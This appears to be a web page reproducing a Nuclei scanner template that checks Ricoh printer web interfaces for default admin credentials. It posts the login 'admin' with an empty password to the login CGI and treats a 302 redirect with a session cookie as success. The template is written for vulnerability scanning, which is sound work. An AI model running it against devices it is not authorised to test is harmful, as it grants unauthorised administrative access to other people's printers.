ricoh-default-login: Ricoh Default Login

2025-08-01 Ricoh Default PoC Public

Description

Ricoh default admin credentials were discovered.

PoC

id: ricoh-default-login

info:
  name: Ricoh Default Login
  author: gy741
  severity: high
  description: Ricoh default admin credentials were discovered.
  reference:
    - https://ricoh-printer.co/default-username-and-password-for-ricoh-web-image-monitor/
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
    cvss-score: 8.3
    cwe-id: CWE-522
  metadata:
    max-request: 1
  tags: ricoh,default-login,intrusive,vuln

http:
  - raw:
      - |
        POST /web/guest/tw/websys/webArch/login.cgi HTTP/1.1
        Host: {{Hostname}}
        Cookie: cookieOnOffChecker=on;

        wimToken=&userid_work=&userid={{base64(username)}}&password_work=&password=&open=

    payloads:
      username:
        - admin
    attack: pitchfork

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - 'wimsesid=[0-9]+'
        part: header

      - type: status
        status:
          - 302
# digest: 4b0a00483046022100affd920c5b4a1620277c424d4d1d9bcf7e69087865cd5563e1de7a41e7e59fb40221009d00ac840815970f7dadbf255d3f1f00f34ef83ef38421b0aadb6a96ba137e09:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities